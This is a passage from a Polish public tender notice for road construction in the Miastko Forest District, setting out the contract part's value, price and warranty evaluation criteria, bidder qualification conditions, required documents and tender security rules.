mm.<br/>6. Przebudowa zjazdu na drogę gminną<br/>- w obrębie łuku R=8 m nawierzchnię należy obramować zatopionym opornikiem betonowym 12x25 cm ustawionym na<br/>ławie betonowej C12/15 z oporem,<br/>- płyty należy dociąć do opornika lub wypełnić brukiem kamiennym układanym na warstwie betonu gr. 10 cm. Szczegółowy<br/>Opis Przedmiotu Zamówienia stanowi:<br/>- dokumentacja projektowa,<br/>- specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiORB).<br/>Miejscem realizacji przedmiotu zamówienia będzie teren Nadleśnictwa Miastko:<br/>- w zakresie części nr 2 zamówienia:<br/>teren Nadleśnictwa Miastko, leśnictwo Łodzierz, droga leśna pożarowa (dojazd pożarowy) nr 2 odcinek 0,34 km na terenie :<br/>- województwo pomorskie, powiat Bytowski, gmina Miastko, obręb Kamnica na działach ewidencyjnych nr : 91/1, 90/4,<br/>101/14. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 189803,34 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert na każdą część zamówienia Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>1) Cena (C) - 60 %<br/>2) Okres gwarancji (G) - 40 %<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2. W ramach kryterium „Okres gwarancji” (G) ocena ofert zostanie dokonana w następujący sposób:<br/>Sposób obliczenia punktów dla kryterium okres gwarancji jakości:<br/>a. Kryterium okresu gwarancji jakości na całość zamówienia będzie<br/>rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji jakości.<br/>b. Maksymalną liczbę punktów jaką można uzyskać w tym kryterium to 40 punktów.<br/>c. Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 36 miesięcy liczonych od daty końcowego odbioru robót.<br/>Najdłuższy oceniany w ramach kryterium okres gwarancji to 60 miesięcy. Jeżeli Wykonawca zaproponuje dłuższy okres gwarancji<br/>niż 60 miesięcy, do oceny oferty w przedmiotowym kryterium zostanie przyjęty 60 miesięczny okres gwarancji jakości.<br/>d. Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach. Jeżeli wykonawca wpisze okres gwarancji<br/>krótszy niż 36 miesiące to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty.<br/>e. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki Zamawiający uzna, że wykonawca deklaruje najkrótszy tj.<br/>36 miesięczny okres gwarancji jakości.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów w/w kryteriach oceny ofert.<br/>Pełen i szczegółowy opis w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie uznany za spełniony jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową o wartości nie mniejszej niż:<br/>na część zamówienia nr 1 - 40 000,00 zł (słownie: czterdzieści tysięcy złotych 00/100).<br/>na część zamówienia nr 2 – 30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100).<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat<br/>liczonych wstecz od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi o wartości nie mniejszej niż:<br/>na część zamówienia nr 1 - 100 000,00 zł brutto.<br/>na część zamówienia nr 2 – 70 000,00 zł brutto.<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>a) co najmniej 1 szt. koparki gąsienicowej lub kołowej o pojemności<br/>łyżki min. 0,60 m3,<br/>b) co najmniej 1 szt. samochodu samowyładowczego o ładowności<br/>min. 5 ton,<br/>c) co najmniej 1 szt. walca wibracyjnego lub statycznego min. 7,5 ton masy własnej,<br/>d) co najmniej 1 szt. równiarki samojezdnej,<br/>e) co najmniej 1 szt. rozkładarki do pospółki/kruszywa.<br/>c) Zamawiający nie stawia szczególnych wymagań w zakresie opisu<br/>spełniania warunku udziału w postępowaniu w odniesieniu do osób skierowanych przez Wykonawcę do realizacji zamówienia<br/>W przypadku składania ofert na obie części zamówienia Wykonawca obowiązany jest wykazać, że posiada środki finansowe lub zdolność kredytową w wysokości odpowiadającej co najmniej sumie kwot określonych wyżej dla części 1 i 2 zamówienia tj. kwotą nie mniejszą niż 70.000,00 zł (słownie: siedemdziesiąt tysięcy złotych).<br/>Wykonawcy, którzy ubiegają się o udzielenie obu części zamówienia mogą wykazywać ten sam potencjał techniczny celem wykazania spełniania warunków udziału w postępowaniu dla obu części zamówienia.<br/>W przypadku składania oferty na obie części zamówienia Wykonawca w ramach ww. warunku udziału w postępowaniu w zakresie doświadczenia może wykazać się tym samym doświadczeniem dla obu części zamówienia, jeżeli doświadczenie to obejmuje wykonanie roboty budowlanej polegającej na budowie, przebudowie lub remoncie drogi o wartości nie mniejszej niż 100.000,00 zł brutto.<br/>2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w<br/>oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9 SWZ.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 7.1. SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji, których te zdolności są wymagane. Zamawiający ocenia,<br/>czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja<br/>finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. ppkt 3) i 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane w pkt 6.1., 6.3. i 6.4. SWZ względem Wykonawcy. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. Jeżeli zdolności techniczne lub zawodowe, sytuacja<br/>ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków<br/>udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów<br/>udostępniających zasoby.<br/>5. Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP w<br/>zw. z art. 266 PZP może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności,<br/>jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>Pełen i szczegółowy opis w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia, Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub<br/>braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 6 do SWZ);<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (oświadczenie<br/>o braku podstaw do wykluczenia, sporządzone wg załącznika nr 3B do SWZ), w zakresie podstaw<br/>wykluczenia z postępowania określonych w:<br/>a) art. 108 ust. 1 pkt 3 PZP,<br/>b) art. 108 ust. 1 pkt 4 PZP dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 PZP,<br/>e) art. 109 ust. 1 pkt 1 PZP, odnośnie naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2023 r. poz. 70),<br/>f) art. 109 ust. 1 pkt 8 i 10 PZP<br/>- wzór oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw<br/>wykluczenia z postępowania stanowi załącznik nr 9 do SWZ.<br/>Pełen i szczegółowy opis w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu, Zamawiający przed udzieleniem zamówienia, działając na<br/>podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane (wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 7 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami<br/>wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.<br/>b) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>c) wykaz urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie<br/>do dysponowania tymi zasobami (wzór wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia<br/>stanowi załącznik nr 8 do SWZ).<br/>Pełen i szczegółowy opis w SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 2 do SWZ) sporządzony pod rygorem nieważności, w<br/>formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>b) Kosztorys ofertowy (sporządzony wg wzoru stanowiącego załącznik nr 10 do SWZ i zgodnie z wymaganiami określonymi<br/>w rozdziale 15 SWZ), sporządzony pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 3A i załącznik 3B do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>d) jeżeli wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby – do oferty należy załączyć<br/>także oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 3C i załącznik 3D do SWZ,<br/>pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji<br/>podmiotu udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 w zw. z art. 266 PZP,<br/>e) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.4. SWZ, jeżeli Wykonawca<br/>wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów; (niewiążący<br/>wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia<br/>stanowi załącznik nr 5 do SWZ),<br/>f) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/podmiotu udostępniającego<br/>zasoby jest umocowana do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby<br/>dostarczy dane umożliwiające dostęp do tych dokumentów,<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, osoby działającej w<br/>imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP<br/>- działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 13.4. lit f)<br/>SWZ, sporządzone w sposób określony w pkt 9.14.-9.19. SWZ,<br/>h) oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz działających w formie<br/>spółki cywilnej (na formularzu oferty zał. nr 2 do SWZ).<br/>i) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych<br/>do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej).<br/>Pełen i szczegółowy opis w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości<br/>na część zamówienia nr 1 – 2 600,00 zł<br/>na część zamówienia nr 2 - 1 800,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2022 r. poz. 2080 ze zm.).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku BNP Paribas<br/>Bank Polska S.A. nr rachunku: 23 2030 00451110 0000 0093 6420 z dopiskiem: wadium na zabezpieczenie oferty w<br/>postępowaniu na „Rozbudowa dróg na terenie nadleśnictwa Miastko – część zamówienia nr …….”. Wniesienie wadium w<br/>pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona<br/>gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>treści wadium wnoszonego w formach określonych w pkt 2 ppkt 2-4) powyżej, powinni zostać ujęci wszyscy członkowie<br/>konsorcjum albo powinno z niej jednoznacznie wynikać, że wykonawca, na którego gwarancja/poręczenie zostały<br/>wystawione działa w imieniu innych członków konsorcjum, bądź w ich treści powinien zostać ujęty szerszy zakres<br/>odpowiedzialności gwaranta/poręczyciela niż tylko dotyczący działań/zaniechań odnoszących się do wykonawcy, na którego<br/>gwarancja/poręczenie to zostało wystawione.<br/>8. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.<br/>Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty –treść pełnomocnictwa powinna dokładnie<br/>określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu<br/>(wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru<br/>stanowiącego załącznik nr 3B do SWZ) składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać<br/>złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci<br/>oświadczenia, z którego<br/>wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w<br/>formularzu Oferty stanowiącym załącznik nr 2 SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/>2. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span 